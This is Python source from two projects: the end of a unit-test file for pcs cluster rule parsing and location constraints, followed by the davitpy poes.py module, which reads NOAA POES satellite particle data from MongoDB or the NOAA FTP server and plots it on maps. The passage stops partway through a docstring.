]) ) # invalid syntax - no change self.assertEquals( ["date"], self.preprocessor.run([ "date" ]) ) self.assertEquals( ["date", "start=2014-06-26"], self.preprocessor.run([ "date", "start=2014-06-26" ]) ) self.assertEquals( ["date", "end=2014-06-26"], self.preprocessor.run([ "date", "end=2014-06-26" ]) ) self.assertEquals( ["date", "start=2014-06-26", "end=2014-07-26"], self.preprocessor.run([ "date", "start=2014-06-26", "end=2014-07-26" ]) ) self.assertEquals( ["date", "start=2014-06-26", "end=2014-07-26", "lt"], self.preprocessor.run([ "date", "start=2014-06-26", "end=2014-07-26", "lt" ]) ) self.assertEquals( ["date", "start=2014-06-26", "lt", "foo"], self.preprocessor.run([ "date", "start=2014-06-26", "lt", "foo" ]) ) self.assertEquals( ["date", "start=2014-06-26", "end=2014-07-26", "gt", "foo"], self.preprocessor.run([ "date", "start=2014-06-26", "end=2014-07-26", "gt", "foo" ]) ) self.assertEquals( ["date", "end=2014-06-26", "gt"], self.preprocessor.run([ "date", "end=2014-06-26", "gt" ]) ) self.assertEquals( ["date", "start=2014-06-26", "in_range", "foo"], self.preprocessor.run([ "date", "start=2014-06-26", "in_range", "foo" ]) ) self.assertEquals( ["date", "end=2014-07-26", "in_range"], self.preprocessor.run([ "date", "end=2014-07-26", "in_range" ]) ) self.assertEquals( ["foo", "start=2014-06-26", "gt"], self.preprocessor.run([ "foo", "start=2014-06-26", "gt" ]) ) self.assertEquals( ["foo", "end=2014-06-26", "lt"], self.preprocessor.run([ "foo", "end=2014-06-26", "lt" ]) ) def testParenthesis(self): self.assertEquals( ["("], self.preprocessor.run(["("]) ) self.assertEquals( [")"], self.preprocessor.run([")"]) ) self.assertEquals( ["(", "(", ")", ")"], self.preprocessor.run(["(", "(", ")", ")"]) ) self.assertEquals( ["(", "(", ")", ")"], self.preprocessor.run(["(())"]) ) self.assertEquals( ["a", "(", "b", ")", "c"], self.preprocessor.run(["a", "(", "b", ")", "c"]) ) self.assertEquals( ["a", "(", "b", "c", ")", "d"], self.preprocessor.run(["a", "(", "b", "c", ")", "d"]) ) self.assertEquals( ["a", ")", "b", "(", "c"], self.preprocessor.run(["a", ")", "b", "(", "c"]) ) self.assertEquals( ["a", "(", "b", ")", "c"], self.preprocessor.run(["a", "(b)", "c"]) ) self.assertEquals( ["a", "(", "b", ")", "c"], self.preprocessor.run(["a(", "b", ")c"]) ) self.assertEquals( ["a", "(", "b", ")", "c"], self.preprocessor.run(["a(b)c"]) ) self.assertEquals( ["aA", "(", "bB", ")", "cC"], self.preprocessor.run(["aA(bB)cC"]) ) self.assertEquals( ["(", "aA", "(", "bB", ")", "cC", ")"], self.preprocessor.run(["(aA(bB)cC)"]) ) self.assertEquals( ["(", "aA", "(", "(", "bB", ")", "cC", ")"], self.preprocessor.run(["(aA(", "(bB)cC)"]) ) self.assertEquals( ["(", "aA", "(", "(", "(", "bB", ")", "cC", ")"], self.preprocessor.run(["(aA(", "(", "(bB)cC)"]) ) class ExportAsExpressionTest(unittest.TestCase): def test_success(self): self.assertXmlExport( """ <rule id="location-dummy-rule" score="INFINITY"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> """, "#uname eq node1", "#uname eq string node1" ) self.assertXmlExport( """ <rule id="location-dummy-rule" score="INFINITY"> <expression attribute="foo" id="location-dummy-rule-expr" operation="gt" type="version" value="1.2.3"/> </rule> """, "foo gt version 1.2.3", "foo gt version 1.2.3" ) self.assertXmlExport( """ <rule boolean-op="or" id="complexRule" score="INFINITY"> <rule boolean-op="and" id="complexRule-rule-1" score="0"> <date_expression id="complexRule-rule-1-expr" operation="date_spec"> <date_spec id="complexRule-rule-1-expr-datespec" weekdays="1-5" hours="12-23"/> </date_expression> <date_expression id="complexRule-rule-1-expr-1" operation="in_range" start="2014-07-26"> <duration id="complexRule-rule-1-expr-1-duration" months="1"/> </date_expression> </rule> <rule boolean-op="and" id="complexRule-rule" score="0"> <expression attribute="foo" id="complexRule-rule-expr-1" operation="gt" type="version" value="1.2"/> <expression attribute="#uname" id="complexRule-rule-expr" operation="eq" value="node3 4"/> </rule> </rule> """, "(date-spec hours=12-23 weekdays=1-5 and date in_range 2014-07-26 to duration months=1) or (foo gt version 1.2 and #uname eq \"node3 4\")", "(#uname eq string \"node3 4\" and foo gt version 1.2) or (date in_range 2014-07-26 to duration months=1 and date-spec hours=12-23 weekdays=1-5)" ) def assertXmlExport(self, rule_xml, export, export_normalized): ac( export + "\n", rule.ExportAsExpression().get_string( xml.dom.minidom.parseString(rule_xml).documentElement, normalize=False ) + "\n" ) ac( export_normalized + "\n", rule.ExportAsExpression().get_string( xml.dom.minidom.parseString(rule_xml).documentElement, normalize=True ) + "\n" ) class DomRuleAddTest(unittest.TestCase): def setUp(self): shutil.copy(empty_cib, temp_cib) output, returnVal = pcs(temp_cib, "resource create dummy1 Dummy") assert returnVal == 0 and output == "" def test_success_xml(self): self.assertExpressionXml( ["#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule" score="INFINITY"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["id=myRule", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="myRule" score="INFINITY"> <expression attribute="#uname" id="myRule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["score=INFINITY", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule" score="INFINITY"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["score=100", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule" score="100"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["score-attribute=pingd", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule" score-attribute="pingd"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["role=master", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule" role="master" score="INFINITY"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["role=slave", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="location-dummy-rule" role="slave" score="INFINITY"> <expression attribute="#uname" id="location-dummy-rule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) self.assertExpressionXml( ["score=100", "id=myRule", "role=master", "#uname", "eq", "node1"], """ <rsc_location id="location-dummy"> <rule id="myRule" role="master" score="100"> <expression attribute="#uname" id="myRule-expr" operation="eq" value="node1"/> </rule> </rsc_location> """ ) def test_success(self): output, returnVal = pcs( temp_cib, "constraint location dummy1 rule #uname eq node1" ) ac(output, "") self.assertEquals(0, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule id=MyRule score=100 role=master #uname eq node2" ) ac(output, "") self.assertEquals(0, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule id=complexRule (#uname eq node3 and foo gt version 1.2) or (date-spec hours=12-23 weekdays=1-5 and date in_range 2014-07-26 to duration months=1)" ) ac(output, "") self.assertEquals(0, returnVal) output, returnVal = pcs(temp_cib, "constraint location show --full") ac(output, """\ Location Constraints: Resource: dummy1 Constraint: location-dummy1 Rule: score=INFINITY (id:location-dummy1-rule) Expression: #uname eq node1 (id:location-dummy1-rule-expr) Constraint: location-dummy1-1 Rule: score=100 role=master (id:MyRule) Expression: #uname eq node2 (id:MyRule-expr) Constraint: location-dummy1-2 Rule: score=INFINITY boolean-op=or (id:complexRule) Rule: score=0 boolean-op=and (id:complexRule-rule) Expression: #uname eq node3 (id:complexRule-rule-expr) Expression: foo gt version 1.2 (id:complexRule-rule-expr-1) Rule: score=0 boolean-op=and (id:complexRule-rule-1) Expression: (id:complexRule-rule-1-expr) Date Spec: hours=12-23 weekdays=1-5 (id:complexRule-rule-1-expr-datespec) Expression: date in_range 2014-07-26 to duration (id:complexRule-rule-1-expr-1) Duration: months=1 (id:complexRule-rule-1-expr-1-duration) """) self.assertEquals(0, returnVal) output, returnVal = pcs(temp_cib, "constraint location show") ac(output, """\ Location Constraints: Resource: dummy1 Constraint: location-dummy1 Rule: score=INFINITY Expression: #uname eq node1 Constraint: location-dummy1-1 Rule: score=100 role=master Expression: #uname eq node2 Constraint: location-dummy1-2 Rule: score=INFINITY boolean-op=or Rule: score=0 boolean-op=and Expression: #uname eq node3 Expression: foo gt version 1.2 Rule: score=0 boolean-op=and Expression: Date Spec: hours=12-23 weekdays=1-5 Expression: date in_range 2014-07-26 to duration Duration: months=1 """) self.assertEquals(0, returnVal) def test_invalid_score(self): output, returnVal = pcs( temp_cib, "constraint location dummy1 rule score=pingd defined pingd" ) ac( output, "Warning: invalid score 'pingd', setting score-attribute=pingd " "instead\n" ) self.assertEquals(0, returnVal) output, returnVal = pcs(temp_cib, "constraint location show --full") ac(output, """\ Location Constraints: Resource: dummy1 Constraint: location-dummy1 Rule: score-attribute=pingd (id:location-dummy1-rule) Expression: defined pingd (id:location-dummy1-rule-expr) """) self.assertEquals(0, returnVal) def test_invalid_rule(self): output, returnVal = pcs( temp_cib, "constraint location dummy1 rule score=100" ) ac(output, "Error: no rule expression was specified\n") self.assertEquals(1, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule #uname eq" ) ac( output, "Error: '#uname eq' is not a valid rule expression: unexpected end " "of rule\n" ) self.assertEquals(1, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule string #uname eq node1" ) ac( output, "Error: 'string #uname eq node1' is not a valid rule expression: " "unexpected 'string' before 'eq'\n" ) self.assertEquals(1, returnVal) def test_ivalid_options(self): output, returnVal = pcs( temp_cib, "constraint location dummy1 rule role=foo #uname eq node1" ) ac(output, "Error: invalid role 'foo', use 'master' or 'slave'\n") self.assertEquals(1, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule score=100 score-attribute=pingd #uname eq node1" ) ac(output, "Error: can not specify both score and score-attribute\n") self.assertEquals(1, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule id=1foo #uname eq node1" ) ac( output, "Error: invalid rule id '1foo', '1' is not a valid first character " "for a rule id\n" ) self.assertEquals(1, returnVal) output, returnVal = pcs(temp_cib, "constraint location show --full") ac(output, "Location Constraints:\n") self.assertEquals(0, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule id=MyRule #uname eq node1" ) ac(output, "") self.assertEquals(0, returnVal) output, returnVal = pcs(temp_cib, "constraint location show --full") ac(output, """\ Location Constraints: Resource: dummy1 Constraint: location-dummy1 Rule: score=INFINITY (id:MyRule) Expression: #uname eq node1 (id:MyRule-expr) """) self.assertEquals(0, returnVal) output, returnVal = pcs( temp_cib, "constraint location dummy1 rule id=MyRule #uname eq node1" ) ac( output, "Error: id 'MyRule' is already in use, please specify another one\n" ) self.assertEquals(1, returnVal) def assertExpressionXml(self, rule_expression, rule_xml): cib_dom = xml.dom.minidom.parse("empty.xml") constraints = cib_dom.getElementsByTagName("constraints")[0] constraint_el = constraints.appendChild( cib_dom.createElement("rsc_location") ) constraint_el.setAttribute("id", "location-dummy") options, rule_argv = rule.parse_argv(rule_expression) rule.dom_rule_add(constraint_el, options, rule_argv) ac( constraint_el.toprettyxml(indent=" "), rule_xml.lstrip().rstrip(" ") ) if __name__ == "__main__": unittest.main()
Shirling-VT/davitpy_sam
davitpy/gme/sat/poes.py
""" .. module:: poes :synopsis: A module for reading, writing, and storing poes Data .. moduleauthor:: AJ, 20130129 ********************* **Module**: gme.sat.poes ********************* **Classes**: * :class:`poesRec` **Functions**: * :func:`readPoes` * :func:`readPoesFtp` * :func:`mapPoesMongo` * :func:`overlayPoesTed` """ from davitpy.gme.base.gmeBase import gmeData class poesRec(gmeData): """a class to represent a record of poes data. Extends :class:`gmeBase.gmeData`. Insight on the class members can be obtained from `the NOAA NGDC site <ftp://satdat.ngdc.noaa.gov/sem/poes/data/readme.txt>`_. Note that Poes data is available from 1998-present day (or whatever the latest NOAA has uploaded is). **The data are the 16-second averages** **Members**: * **time** (`datetime <http://tinyurl.com/bl352yx>`_): an object identifying which time these data are for * **info** (str): information about where the data come from. *Please be courteous and give credit to data providers when credit is due.* * **dataSet** (str): the name of the data set * **satnum** (ind): the noaa satellite number * **sslat** (float): Geographic Latitude of sub-satellite point, degrees * **sslon** (float): Geographic Longitude of sub-satellite point, degrees * **folat** (float): Geographic Latitude of foot-of-field-line, degrees * **folon** (float): Geographic Longitude of foot-of-field-line, degrees * **lval** (float): L-value * **mlt** (float): Magnetic local time of foot-of-field-line, degrees * **pas0** (float): MEPED-0 pitch angle at satellite, degrees * **pas90** (float): MEPED-90 pitch angle at satellite, degrees * **mep0e1** (float): MEPED-0 > 30 keV electrons, counts/sec * **mep0e2** (float): MEPED-0 > 100 keV electrons, counts/sec * **mep0e3** (float): MEPED-0 > 300 keV electrons, counts/sec * **mep0p1** (float):MEPED-0 30 keV to 80 keV protons, counts/sec * **mep0p2** (float): MEPED-0 80 keV to 240 keV protons, counts/sec * **mep0p3** (float): 240 kev to 800 keV protons, counts/sec * **mep0p4** (float): MEPED-0 800 keV to 2500 keV protons, counts/sec * **mep0p5** (float): MEPED-0 2500 keV to 6900 keV protons, counts/sec * **mep0p6** (float): MEPED-0 > 6900 keV protons, counts/sec, * **mep90e1** (float): MEPED-90 > 30 keV electrons, counts/sec, * **mep90e2** (float): MEPED-90 > 100 keV electrons, counts/sec * **mep90e3** (float): MEPED-90 > 300 keV electrons, counts/sec * **mep90p1** (float): MEPED-90 30 keV to 80 keV protons, counts/sec * **mep90p2** (float): MEPED-90 80 keV to 240 keV protons, counts/sec * **mep90p3** (float): MEPED-90 240 kev to 800 keV protons, counts/sec, * **mep90p4** (float): MEPED-90 800 keV to 2500 keV protons, counts/sec * **mep90p5** (float): MEPED-90 2500 keV to 6900 keV protons, counts/sec * **mep90p6** (float):MEPED-90 > 6900 keV protons, counts/sec * **mepomp6** (float): MEPED omni-directional > 16 MeV protons, counts/sec * **mepomp7** (float): MEPED omni-directional > 36 Mev protons, counts/sec * **mepomp8** (float): MEPED omni-directional > 70 MeV protons, counts/sec * **mepomp9** (float): MEPED omni-directional >= 140 MeV protons * **ted** (float): TED, Total Energy Detector Average, ergs/cm2/sec * **echar** (float): TED characteristic energy of electrons, eV * **pchar** (float): TED characteristic energy of protons, eV * **econtr** (float): TED electron contribution, Electron Energy/Total Energy .. note:: If any of the members have a value of None, this means that they could not be read for that specific time **Methods**: * :func:`parseFtp` **Example**: :: emptyPoesObj = gme.sat.poesRec() written by AJ, 20130131 """ def parseFtp(self,line, header): """This method is used to convert a line of poes data read from the NOAA NGDC FTP site into a :class:`poesRec` object. .. note:: In general, users will not need to worry about this. **Belongs to**: :class:`poesRec` **Args**: * **line** (str): the ASCII line from the FTP server **Returns**: * Nothing. **Example**: :: myPoesObj.parseFtp(ftpLine) written by AJ, 20130131 """ import datetime as dt #split the line into cols cols = line.split() head = header.split() self.time = dt.datetime(int(cols[0]), int(cols[1]), int(cols[2]), int(cols[3]),int(cols[4]), \ int(float(cols[5])),int(round((float(cols[5])-int(float(cols[5])))*1e6))) for key in self.__dict__.iterkeys(): if(key == 'dataSet' or key == 'info' or key == 'satnum' or key == 'time'): continue try: ind = head.index(key) except Exception,e: print e print 'problem setting attribute',key #check for a good value if(float(cols[ind]) != -999.): setattr(self,key,float(cols[ind])) def __init__(self, ftpLine=None, dbDict=None, satnum=None, header=None): """the intialization fucntion for a :class:`omniRec` object. .. note:: In general, users will not need to worry about this. **Belongs to**: :class:`omniRec` **Args**: * [**ftpLine**] (str): an ASCII line from the FTP server. if this is provided, the object is initialized from it. header must be provided in conjunction with this. default=None * [**header**] (str): the header from the ASCII FTP file. default=None * [**dbDict**] (dict): a dictionary read from the mongodb. if this is provided, the object is initialized from it. default = None * [**satnum**] (int): the satellite nuber. default=None **Returns**: * Nothing. **Example**: :: myPoesObj = poesRec(ftpLine=aftpLine) written by AJ, 20130131 """ #note about where data came from self.dataSet = 'Poes' self.info = 'These data were downloaded from NASA SPDF. *Please be courteous and give credit to data providers when credit is due.*' self.satnum = satnum self.sslat = None self.sslon = None self.folat = None self.folon = None self.lval = None self.mlt = None self.pas0 = None self.pas90 = None self.mep0e1 = None self.mep0e2 = None self.mep0e3 = None self.mep0p1 = None self.mep0p2 = None self.mep0p3 = None self.mep0p4 = None self.mep0p5 = None self.mep0p6 = None self.mep90e1 = None self.mep90e2 = None self.mep90e3 = None self.mep90p1 = None self.mep90p2 = None self.mep90p3 = None self.mep90p4 = None self.mep90p5 = None self.mep90p6 = None self.mepomp6 = None self.mepomp7 = None self.mepomp8 = None self.mepomp9 = None self.ted = None self.echar = None self.pchar = None self.econtr = None #if we're initializing from an object, do it! if(ftpLine != None): self.parseFtp(ftpLine,header) if(dbDict != None): self.parseDb(dbDict) def readPoes(sTime,eTime=None,satnum=None,folat=None,folon=None,ted=None,echar=None,pchar=None): """This function reads poes data. First, it will try to get it from the mongodb, and if it can't find it, it will look on the NOAA NGDC FTP server using :func:`readPoesFtp`. The data are 16-second averages **Args**: * **sTime** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the earliest time you want data for * [**eTime**] (`datetime <http://tinyurl.com/bl352yx>`_ or None): the latest time you want data for. if this is None, end Time will be 1 day after sTime. default = None * [**satnum**] (int): the satellite you want data for. eg 17 for noaa17. if this is None, data for all satellites will be returned. default = None * [**satnum**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with bx values in the range [a,b] will be returned. default = None * [**folat**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with bx values in the range [a,b] will be returned. default = None * [**folon**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with bye values in the range [a,b] will be returned. default = None * [**ted**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with bze values in the range [a,b] will be returned. default = None * [**echar**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with bym values in the range [a,b] will be returned. default = None * [**pchar**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with bzm values in the range [a,b] will be returned. default = None **Returns**: * **poesList** (list or None): if data is found, a list of :class:`poesRec` objects matching the input parameters is returned. If no data is found, None is returned. **Example**: :: import datetime as dt poesList = gme.sat.readPoes(sTime=dt.datetime(2011,1,1),eTime=dt.datetime(2011,6,1),folat=[60,80]) written by AJ, 20130131 """ import datetime as dt import davitpy.pydarn.sdio.dbUtils as db #check all the inputs for validity assert(isinstance(sTime,dt.datetime)), \ 'error, sTime must be a datetime object' assert(eTime == None or isinstance(eTime,dt.datetime)), \ 'error, eTime must be either None or a datetime object' assert(satnum == None or isinstance(satnum,int)), 'error, satnum must be an int' var = locals() for name in ['folat','folon','ted','echar','pchar']: assert(var[name] == None or (isinstance(var[name],list) and \ isinstance(var[name][0],(int,float)) and isinstance(var[name][1],(int,float)))), \ 'error,'+name+' must None or a list of 2 numbers' if(eTime == None): eTime = sTime+dt.timedelta(days=1) qryList = [] #if arguments are provided, query for those qryList.append({'time':{'$gte':sTime}}) if(eTime != None): qryList.append({'time':{'$lte':eTime}}) if(satnum != None): qryList.append({'satnum':satnum}) var = locals() for name in ['folat','folon','ted','echar','pchar']: if(var[name] != None): qryList.append({name:{'$gte':min(var[name])}}) qryList.append({name:{'$lte':max(var[name])}}) #construct the final query definition qryDict = {'$and': qryList} #connect to the database poesData = db.getDataConn(dbName='gme',collName='poes') #do the query if(qryList != []): qry = poesData.find(qryDict) else: qry = poesData.find() if(qry.count() > 0): poesList = [] for rec in qry.sort('time'): poesList.append(poesRec(dbDict=rec)) print '\nreturning a list with',len(poesList),'records of poes data' return poesList #if we didn't find anything on the mongodb else: print '\ncould not find requested data in the mongodb' return None #print 'we will look on the ftp server, but your conditions will be (mostly) ignored' ##read from ftp server #poesList = readPoesFtp(sTime, eTime) #if(poesList != None): #print '\nreturning a list with',len(poesList),'recs of poes data' #return poesList #else: #print '\n no data found on FTP server, returning None...' #return None def readPoesFtp(sTime,eTime=None): """This function reads poes data from the NOAA NGDC server via anonymous FTP connection. .. warning:: You should not use this. Use the general function :func:`readPoes` instead. **Args**: * **sTime** (`datetime <http://tinyurl.com/bl352yx>`_): the earliest time you want data for * [**eTime**] (`datetime <http://tinyurl.com/bl352yx>`_ or None): the latest time you want data for. if this is None, eTime will be equal 1 day after sTime. default = None **Returns**: * **poesList** (list or None): if data is found, a list of :class:`poesRec` objects matching the input parameters is returned. If no data is found, None is returned. **Example**: :: import datetime as dt poesList = gme.sat.readpoesFtp(dt.datetime(2011,1,1,1,50),eTime=dt.datetime(2011,1,1,10,0)) written by AJ, 20130128 """ from ftplib import FTP import datetime as dt assert(isinstance(sTime,dt.datetime)),'error, sTime must be datetime' if(eTime == None): eTime=sTime+dt.timedelta(days=1) assert(isinstance(eTime,dt.datetime)),'error, eTime must be datetime' assert(eTime >= sTime), 'error, end time greater than start time' #connect to the server try: ftp = FTP('satdat.ngdc.noaa.gov') except Exception,e: print e print 'problem connecting to NOAA server' return None #login as anonymous try: l=ftp.login() except Exception,e: print e print 'problem logging in to NOAA server' return None myPoes = [] #get the poes data myTime = dt.datetime(sTime.year,sTime.month,sTime.day) while(myTime <= eTime): #go to the data directory try: ftp.cwd('/sem/poes/data/avg/txt/'+str(myTime.year)) except Exception,e: print e print 'error getting to data directory' return None #list directory contents dirlist = ftp.nlst() for dire in dirlist: #check for satellite directory if(dire.find('noaa') == -1): continue satnum = dire.replace('noaa','') #chege to file directory ftp.cwd('/sem/poes/data/avg/txt/'+str(myTime.year)+'/'+dire) fname = 'poes_n'+satnum+'_'+myTime.strftime("%Y%m%d")+'.txt' print 'poes: RETR '+fname #list to hold the lines lines = [] #get the data try: ftp.retrlines('RETR '+fname,lines.append) except Exception,e: print e print 'error retrieving',fname #convert the ascii lines into a list of poesRec objects #skip first (header) line for line in lines[1:]: cols = line.split() t = dt.datetime(int(cols[0]), int(cols[1]), int(cols[2]), int(cols[3]),int(cols[4])) if(sTime <= t <= eTime): myPoes.append(poesRec(ftpLine=line,satnum=int(satnum),header=lines[0])) #increment myTime myTime += dt.timedelta(days=1) if(len(myPoes) > 0): return myPoes else: return None def mapPoesMongo(sYear,eYear=None): """This function reads poes data from the NOAA NGDC FTP server via anonymous FTP connection and maps it to the mongodb. .. warning:: In general, nobody except the database admins will need to use this function **Args**: * **sYear** (int): the year to begin mapping data * [**eYear**] (int or None): the end year for mapping data. if this is None, eYear will be sYear **Returns**: * Nothing. **Example**: :: gme.sat.mapPoesMongo(2004) written by AJ, 20130131 """ import davitpy.pydarn.sdio.dbUtils as db from davitpy import rcParams import datetime as dt #check inputs assert(isinstance(sYear,int)),'error, sYear must be int' if(eYear == None): eYear=sYear assert(isinstance(eYear,int)),'error, sYear must be None or int' assert(eYear >= sYear), 'error, end year greater than start year' #get data connection mongoData = db.getDataConn(username=rcParams['DBWRITEUSER'],password=rcParams['DBWRITEPASS'],\ dbAddress=rcParams['SDDB'],dbName='gme',collName='poes') #set up all of the indices mongoData.ensure_index('time') mongoData.ensure_index('satnum') mongoData.ensure_index('folat') mongoData.ensure_index('folon') mongoData.ensure_index('ted') mongoData.ensure_index('echar') mongoData.ensure_index('pchar') #read the poes data from the FTP server myTime = dt.datetime(sYear,1,1) while(myTime < dt.datetime(eYear+1,1,1)): #10 day at a time, to not fill up RAM templist = readPoesFtp(myTime,myTime+dt.timedelta(days=10)) if(templist == None): continue for rec in templist: #check if a duplicate record exists qry = mongoData.find({'$and':[{'time':rec.time},{'satnum':rec.satnum}]}) print rec.time, rec.satnum tempRec = rec.toDbDict() cnt = qry.count() #if this is a new record, insert it if(cnt == 0): mongoData.insert(tempRec) #if this is an existing record, update it elif(cnt == 1): print 'foundone!!' dbDict = qry.next() temp = dbDict['_id'] dbDict = tempRec dbDict['_id'] = temp mongoData.save(dbDict) else: print 'strange, there is more than 1 record for',rec.time del templist myTime += dt.timedelta(days=10) def overlayPoesTed( baseMapObj, axisHandle, startTime, endTime = None, coords = 'geo', \ hemi = 1, folat = [45., 90.], satNum = None, param='ted', scMin=-3.,scMax=0.5) : """This function overlays POES TED data onto a map object. **Args**: * **baseMapObj** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the map object you want data to be overlayed on. * **axisHandle** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the Axis Handle used. * **startTime** (`datetime <http://tinyurl.com/bl352yx>`_ or None): the starttime you want data for. If endTime is not given overlays data from satellites with in +/- 45 min of the startTime * [**endTime**] (`datetime <http://tinyurl.com/bl352yx>`_ or None): the latest time you want data for. if this is None, data from satellites with in +/- 45 min of the startTime is overlayed. default = None * [**satnum**] (int): the satellite you want data for. eg 17 for noaa17. if this is None, data for all satellites will be returned. default = None * [**coords**] (str): Coordinates of the map object on which you want data to be overlayed on, 'geo', 'mag', 'mlt'. Default 'geo' * [**hemi**] (list or None): Hemisphere of the map object on which you want data to be overlayed on. Value is 1 for northern hemisphere and -1 for the southern hemisphere.Default 1 [**folat**] (list or None): if this is not None, it must be a 2-element list of numbers, [a,b]. In this case, only data with latitude values in the range [a,b] will be returned. default = None * [**param**] (str): the name of the poes parameter to be plotted. default='ted' **Returns**: POES TED data is overlayed on the map object. If no data is found, None is returned. **Example**: :: import datetime as dt poesList = gme.sat.overlayPoesTed(MapObj, sTime=dt.datetime(2011,3,4,4)) written by Bharat Kunduri, 20130216 """ import utils import matplotlib as mp import datetime import numpy import matplotlib.pyplot as plt import gme.sat.poes as Poes import math import models import matplotlib.cm as cm from scipy import optimize #check all the inputs for validity assert(isinstance(startTime,datetime.datetime)), \ 'error, sTime must be a datetime object' assert(endTime == None or isinstance(endTime,datetime.datetime)), \ 'error, eTime must be either None or a datetime object' var = locals() assert(var['satNum'] == None or (isinstance(var['satNum'],list) )), \ 'error, satNum must None or a list of satellite (integer) numbers' if satNum != None : assert( len(satNum) <= 5 ), \ 'error, there are only 5 POES satellites in operation (atleast when I wrote this code)' assert(var['folat'] == None or (isinstance(var['folat'],list) and \ isinstance(var['folat'][0],(int,float)) and isinstance(var['folat'][1],(int,float)))), \ 'error, folat must None or a list of 2 numbers' # Check the hemisphere and get the appropriate folat folat = [ math.fabs( folat[0] ) * hemi, math.fabs( folat[1] ) * hemi ] # Check if the endTime is given in which case the user wants a specific time interval to search for # If not we'll give him the best available passes for the selected start time... if ( endTime != None ) : timeRange = numpy.array( [ startTime, endTime ] ) else : timeRange = None pltTimeInterval = numpy.array( datetime.timedelta( minutes = 45 ) ) # check if the timeRange is set... if not set the timeRange to +/- pltTimeInterval of the startTime if timeRange == None: timeRange = numpy.array( [ startTime - pltTimeInterval, startTime + pltTimeInterval ] ) # SatNums - currently operational POES satellites are 15, 16, 17, 18, 19 if satNum == None: satNum = [None] # If any particular satellite number is not chosen by user loop through all the available one's satNum = numpy.array( satNum ) # I like numpy arrays better that's why I'm converting the satNum list to a numpy array latPoesAll = [[] for j in range(len(satNum))] lonPoesAll = [[] for j in range(len(satNum))] tedPoesAll = [[] for j in range(len(satNum))] timePoesAll = [[] for j in range(len(satNum))] lenDataAll = [[] for j in range(len(satNum))] goodFlg=False for sN in range(len(satNum)) : if(satNum[sN] != None): currPoesList = Poes.readPoes(timeRange[0], eTime = timeRange[1], satnum = int(satNum[sN]), folat = folat) else: currPoesList = Poes.readPoes(timeRange[0], eTime = timeRange[1], satnum = satNum[sN], folat = folat) # Check if the data is loaded... if currPoesList == None : print 'No data found' continue #return None else: goodFlg=True # Loop through the list and store the data into arrays lenDataAll.append(len(currPoesList)) for l in currPoesList : # Store our data in arrays try: tedPoesAll[sN].append(math.log10(getattr(l,param))) if coords == 'mag' or coords == 'mlt': lat,lon,_ = models.aacgm.aacgmConv(l.folat,l.folon, 0., l.time.year, 0) latPoesAll[sN].append(lat) if coords == 'mag': lonPoesAll[sN].append(lon) else: lonPoesAll[sN].append(models.aacgm.mltFromEpoch(utils.timeUtils.datetimeToEpoch(l.time),lon)*360./24.) else: latPoesAll[sN].append(l.folat) lonPoesAll[sN].append(l.folon) timePoesAll[sN].append(l.time) except Exception,e: print e print 'could not get parameter for time',l.time if(not goodFlg): return None latPoesAll = numpy.array( latPoesAll ) lonPoesAll = numpy.array( lonPoesAll ) tedPoesAll = numpy.array( tedPoesAll ) timePoesAll = numpy.array( timePoesAll ) lenDataAll = numpy.array( lenDataAll ) poesTicks = [ -3.0, -2.5, -2.0, -1.5, -1.0, -0.5, 0.0, 0.5 ] # get the axis of the figure... ax = axisHandle for nn in range( len(satNum) ) : x, y = baseMapObj(lonPoesAll[nn], latPoesAll[nn]) bpltpoes = baseMapObj.scatter(x,y,c=tedPoesAll[nn], vmin=scMin, vmax=scMax, alpha = 0.7, cmap=cm.jet, zorder = 7., edgecolor='none') timeCurr = timePoesAll[nn] for aa in range( len(latPoesAll[nn]) ) : if aa % 10 == 0: str_curr = str(timeCurr[aa].hour)+':'+str(timeCurr[aa].minute) ax.annotate( str_curr, xy =( x[aa], y[aa] ), size = 5, zorder = 6. ) #cbar = plt.colorbar(bpltpoes, ticks = poesTicks, orientation='horizontal') #cbar.ax.set_xticklabels(poesTicks) #cbar.set_label(r"Total Log Energy Flux [ergs cm$^{-2}$ s$^{-1}$]") return bpltpoes def overlayPoesBnd( baseMapObj, axisHandle, startTime, coords = 'geo', hemi = 1, equBnd = True, polBnd = False ) : """This function reads POES TED data with in +/- 45min of 